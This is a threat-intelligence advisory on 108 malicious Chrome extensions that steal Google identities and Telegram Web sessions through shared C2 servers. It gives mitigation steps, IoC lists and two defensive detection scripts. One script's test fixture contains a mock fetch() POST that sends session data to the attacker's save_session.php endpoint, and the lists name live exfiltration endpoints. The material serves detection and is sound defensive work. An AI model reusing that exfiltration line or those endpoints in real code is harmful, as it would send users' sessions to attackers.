108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure
A coordinated campaign of 108 malicious Chrome extensions operated through shared command-and-control infrastructure at cloudapi[.]stream has been identified, collectively accounting for approximately 20,000 installations. The campaign spans multiple threat categories: 54 extensions steal Google account identities via OAuth2, one extension actively exfiltrates Telegram Web sessions every 15 seconds, and 45 extensions contain a universal backdoor enabling arbitrary URL execution on browser startup. Published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), these extensions masquerade as legitimate tools including Telegram sidebar clients, slot games, YouTube and TikTok enhancers, and translation utilities. All extensions route stolen credentials, user identities, and browsing data to servers controlled by the same operator, with infrastructure confirming a Malware-as-a-Service business model.
AI Analysis
Technical Summary
This campaign consists of 108 malicious Chrome extensions that share command-and-control infrastructure hosted under cloudapi.stream, with further hosts at top.rodeo, interalt.net, nashprom.info and webuk.tech (all listed under Indicators of Compromise below). The extensions fall into three groups: 54 that obtain the victim's Google account identity through an OAuth2 flow (the listed mines.cloudapi.stream/auth_google and /user_info endpoints are consistent with this), one that copies the victim's Telegram Web session to tg.cloudapi.stream every 15 seconds (the save_session.php, get_session.php and related endpoints in the IoC list), and 45 that carry a generic backdoor which opens an operator-supplied URL when the browser starts. They masquerade as legitimate tools across several categories and were published under five publisher identities. The shared infrastructure across those identities points to a coordinated Malware-as-a-Service operation. Because the extensions are themselves the malicious component rather than an exploit of a Chrome flaw, there is no vendor patch to apply; remediation is removal of the extensions and revocation of the access they obtained.
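The 15-second session upload is the most recognisable network artifact in this campaign. The script below is an added example, not code from the Socket report or the AlienVault pulse: it takes the domains and IP from the page's IoC list, matches proxy log entries against them (including every subdomain of cloudapi.stream), and flags any client/host/path group whose median inter-request gap sits near 15 seconds. The log format and the sample lines are constructed for the example; a real deployment would swap `parse_line` for the format of the proxy in use.

```python
"""Added example (not from the Socket/AlienVault report): match proxy log
entries against the campaign's C2 indicators and flag fixed-interval beacons."""
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit

# Registrable domains and IP from the page's IoC list. Matching on the base
# domain catches every *.cloudapi.stream subdomain (tg., mines., api., ...).
C2_DOMAINS = {"cloudapi.stream", "top.rodeo", "interalt.net", "nashprom.info", "webuk.tech"}
C2_IPS = {"144.126.135.238"}


def is_c2_host(host: str) -> bool:
    """True if host is a listed C2 domain, a subdomain of one, or the C2 IP."""
    host = host.lower().rstrip(".")
    if host in C2_IPS:
        return True
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def parse_line(line: str):
    """Parse one constructed log line: '<ISO timestamp> <client> <method> <url>'.
    Adapt this to the real proxy format (Squid, Zscaler, Bluecoat, ...)."""
    ts, client, method, url = line.split(maxsplit=3)
    parts = urlsplit(url)
    return datetime.fromisoformat(ts), client, method, parts.hostname or "", parts.path


def find_c2_traffic(lines, expected_gap=15.0, tolerance=2.0, min_hits=4):
    """Group C2 hits by (client, host, path) and flag groups whose median
    inter-request gap sits near expected_gap seconds, the cadence the report
    gives for the Telegram session upload."""
    hits = defaultdict(list)
    for line in lines:
        ts, client, _method, host, path = parse_line(line)
        if host and is_c2_host(host):
            hits[(client, host, path)].append(ts)
    findings = []
    for (client, host, path), times in hits.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        gap = median(gaps) if gaps else None
        # Short-circuit keeps the abs() off a None gap when there are too few hits.
        periodic = len(times) >= min_hits and abs(gap - expected_gap) <= tolerance
        findings.append({"client": client, "host": host, "path": path,
                         "count": len(times), "median_gap": gap, "periodic": periodic})
    return findings


# Constructed sample: one workstation uploading a Telegram session every ~15 s,
# one Google OAuth identity hand-off, and ordinary traffic that must not match.
SAMPLE_LOG = [
    "2026-04-14T15:46:00 10.0.0.5 POST http://tg.cloudapi.stream/save_session.php",
    "2026-04-14T15:46:03 10.0.0.5 GET https://web.telegram.org/a/",
    "2026-04-14T15:46:15 10.0.0.5 POST http://tg.cloudapi.stream/save_session.php",
    "2026-04-14T15:46:30 10.0.0.5 POST http://tg.cloudapi.stream/save_session.php",
    "2026-04-14T15:46:46 10.0.0.5 POST http://tg.cloudapi.stream/save_session.php",
    "2026-04-14T15:47:00 10.0.0.5 POST http://tg.cloudapi.stream/save_session.php",
    "2026-04-14T15:47:02 10.0.0.9 GET http://mines.cloudapi.stream/auth_google",
    "2026-04-14T15:47:05 10.0.0.9 GET https://cloudapi.stream.example.com/",
]

if __name__ == "__main__":
    for f in find_c2_traffic(SAMPLE_LOG):
        flag = "BEACON" if f["periodic"] else "hit"
        print(f"{flag}: {f['client']} -> {f['host']}{f['path']} x{f['count']} "
              f"(median gap {f['median_gap']})")
```

Any single hit on a C2 host is already worth an alert; the interval check is there to separate the continuously exfiltrating Telegram extension (which keeps the attacker's session copy current) from a one-off install or OAuth hand-off, and to rank hosts for containment.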
Potential Impact
The campaign lets the operator take over Google account identities, replay stolen Telegram Web sessions, and open arbitrary URLs in the victim's browser at startup, leading to unauthorized account access, data theft and persistent browser compromise. A copied Telegram Web session can be used from the attacker's machine without the victim's password or second factor for as long as the session remains valid, and the 15-second upload cadence keeps the attacker's copy current. The shared C2 consolidates credentials and session data from all 108 extensions, so a single operator holds the take from roughly 20,000 installations. This is not an exploit of a vulnerability in Chrome: the extensions themselves are the malware and were actively distributed and installed, so the threat is live for anyone who installed them rather than theoretical.
Mitigation Recommendations
There is no patch to apply: Chrome itself is not vulnerable, and remediation consists of removing the extensions and revoking what they obtained. Practical steps:
- Inventory installed extensions (chrome://extensions, or the Extensions folder of each Chrome profile on disk) and remove any that match the publisher identities Yana Project, GameGen, SideGames, Rodeo Games or InterAlt, or that present as Telegram sidebar clients, slot games, YouTube/TikTok enhancers or translation utilities from unfamiliar publishers. The page lists no extension IDs, so matching is by publisher, name and embedded indicators.
- For the Google identity theft: in the Google Account under Security, review third-party apps and services and remove any unrecognised access; if the account may be compromised, change the password and sign out of all devices.
- For the Telegram Web session theft: in Telegram, open Settings > Devices (Active Sessions) and terminate all other sessions. A copied session stays valid until it is terminated, so a password change alone does not close it.
- For the startup backdoor: after removing the extensions, confirm that no unexpected pages open when the browser launches.
- Block the listed C2 domains (cloudapi.stream and its subdomains, top.rodeo, interalt.net, nashprom.info, webuk.tech) and the IP 144.126.135.238 at DNS or proxy, and search proxy logs for past connections to them to identify affected users.
- In managed environments, enforce an extension allowlist with the Chrome ExtensionInstallAllowlist and ExtensionInstallBlocklist policies so that only approved extensions can be installed.
Monitoring the affected accounts for unusual activity after remediation remains advisable.
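Because the page gives publisher names and C2 hosts but no extension IDs, a host-side sweep has to work from what is on disk. The script below is an added example (not code from the report or from any of the extensions): it walks the unpacked extension directories of each Chrome profile, flags a manifest that names one of the five publishers, and flags any script, JSON or HTML file that embeds one of the C2 domains. The profile paths are the defaults for Google Chrome on Windows, macOS and Linux; other Chromium browsers use different paths. The `demo()` fixture, including its extension IDs and file contents, is constructed for the example.

```python
"""Added example (not from the report): inventory the unpacked extensions in a
Chrome profile and flag any that name a campaign publisher or embed a C2 host."""
import glob
import json
import os
import re
import sys
import tempfile
from pathlib import Path

# Indicators from the page; the publisher names are the five Web Store identities.
C2_DOMAINS = ("cloudapi.stream", "top.rodeo", "interalt.net", "nashprom.info", "webuk.tech")
PUBLISHERS = ("yana project", "gamegen", "sidegames", "rodeo games", "interalt")
DOMAIN_RE = re.compile("|".join(re.escape(d) for d in C2_DOMAINS), re.IGNORECASE)
SCAN_SUFFIXES = {".js", ".json", ".html"}


def default_extension_roots():
    """The 'Extensions' folder of every Chrome profile for the current user."""
    home = Path.home()
    if sys.platform == "win32":
        base = Path(os.environ.get("LOCALAPPDATA", home)) / "Google" / "Chrome" / "User Data"
    elif sys.platform == "darwin":
        base = home / "Library" / "Application Support" / "Google" / "Chrome"
    else:
        base = home / ".config" / "google-chrome"
    return [Path(p) for p in glob.glob(str(base / "*" / "Extensions"))]


def scan_extension_dir(ext_dir: Path):
    """Reasons one unpacked extension version looks like part of the campaign."""
    reasons = []
    try:
        manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8-sig"))
    except (OSError, ValueError):
        return reasons
    # Manifest strings can be localized ("__MSG_appName__"); only literals are checked.
    author = manifest.get("author", "")
    if isinstance(author, dict):
        author = author.get("email", "")
    fields = " ".join(str(manifest.get(k, "")) for k in ("name", "description", "homepage_url"))
    if any(p in (fields + " " + str(author)).lower() for p in PUBLISHERS):
        reasons.append("manifest names a campaign publisher")
    # Any hard-coded C2 host in code or data is decisive; one hit is enough.
    for path in sorted(ext_dir.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            m = DOMAIN_RE.search(path.read_text(encoding="utf-8", errors="ignore"))
            if m:
                reasons.append(f"{path.relative_to(ext_dir)} contains {m.group(0).lower()}")
                break
    return reasons


def scan_root(root: Path):
    """Map extension ID -> reasons for every flagged <id>/<version>/ under root."""
    findings = {}
    for manifest in sorted(root.glob("*/*/manifest.json")):
        reasons = scan_extension_dir(manifest.parent)
        if reasons:
            findings[manifest.parent.parent.name] = reasons
    return findings


def demo():
    """Build a constructed Extensions tree (IDs and contents are made up) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bad = root / "aaaabbbbccccddddeeeeffffgggghhhh" / "1.2.0_0"
        good = root / "iiiijjjjkkkkllllmmmmnnnnoooopppp" / "3.0.1_0"
        for d in (bad, good):
            d.mkdir(parents=True)
        (bad / "manifest.json").write_text(json.dumps({
            "manifest_version": 3, "name": "Telegram Sidebar", "version": "1.2.0",
            "author": "InterAlt", "background": {"service_worker": "background.js"}}))
        (bad / "background.js").write_text(
            'fetch("http://tg.cloudapi.stream/save_session.php", {method: "POST"});')
        (good / "manifest.json").write_text(json.dumps({
            "manifest_version": 3, "name": "Weather Widget", "version": "3.0.1"}))
        (good / "background.js").write_text('fetch("https://api.example.com/forecast");')
        return scan_root(root)


if __name__ == "__main__":
    for root in default_extension_roots():
        print(root, scan_root(root))
    print("demo:", demo())
```

The extension ID printed by `scan_root` is the directory name under Extensions, which is the same ID shown on chrome://extensions; once a match is confirmed that ID can go straight into an ExtensionInstallBlocklist policy for the rest of the fleet.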
Indicators of Compromise
- ip: 144.126.135.238
- domain: cloudapi.stream
- domain: interalt.net
- domain: message.data (likely a JavaScript property path extracted from the extension code rather than a host; verify before blocking)
- domain: nashprom.info
- domain: profile.email (likely a JavaScript property path from the Google profile object rather than a host; verify before blocking)
- domain: profile.name (likely a JavaScript property path from the Google profile object rather than a host; verify before blocking)
- domain: webuk.tech
- email: support@top.rodeo
- domain: api.cloudapi.stream
- domain: cdn.cloudapi.stream
- domain: chat.cloudapi.stream
- domain: chrome.runtime.id (the Chrome extension API property, not a host; an extraction artifact that should not be blocked)
- domain: coin-miner.cloudapi.stream
- domain: crm.cloudapi.stream
- domain: gamewss.cloudapi.stream
- domain: goldminer.cloudapi.stream
- domain: herculessportslegend.cloudapi.stream
- domain: metal.cloudapi.stream
- domain: mines.cloudapi.stream
- domain: multiaccount.cloudapi.stream
- domain: tg.cloudapi.stream
- domain: topup.cloudapi.stream
- domain: wheel.cloudapi.stream
- url: http://api.cloudapi.stream:8443/Register
- url: http://api.cloudapi.stream:8443/Translation
- url: http://cloudapi.stream/install/
- url: http://cloudapi.stream/uninstall/
- url: http://mines.cloudapi.stream/auth_google
- url: http://mines.cloudapi.stream/slot_test/
- url: http://mines.cloudapi.stream/user_info
- url: http://tg.cloudapi.stream/count_sessions.php
- url: http://tg.cloudapi.stream/delete_session.php
- url: http://tg.cloudapi.stream/get_session.php
- url: http://tg.cloudapi.stream/get_sessions.php
- url: http://tg.cloudapi.stream/save_session.php
- url: http://tg.cloudapi.stream/save_title.php
- url: http://top.rodeo/notify.php
- url: http://top.rodeo/server/remote.php
- url: http://top.rodeo/server/remote3.php
Technical Details
- Author: AlienVault
- TLP: white
- References: https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-shared-c2
- Adversary: none listed
- Pulse Id: 69de5f631a2f4bca81392ccd
- Threat Score: none listed
Threat ID: 69de616b82d89c981fbc694d
Added to database: 4/14/2026, 3:46:51 PM
Last enriched: 4/14/2026, 4:01:50 PM
Last updated: 5/29/2026, 11:00:04 AM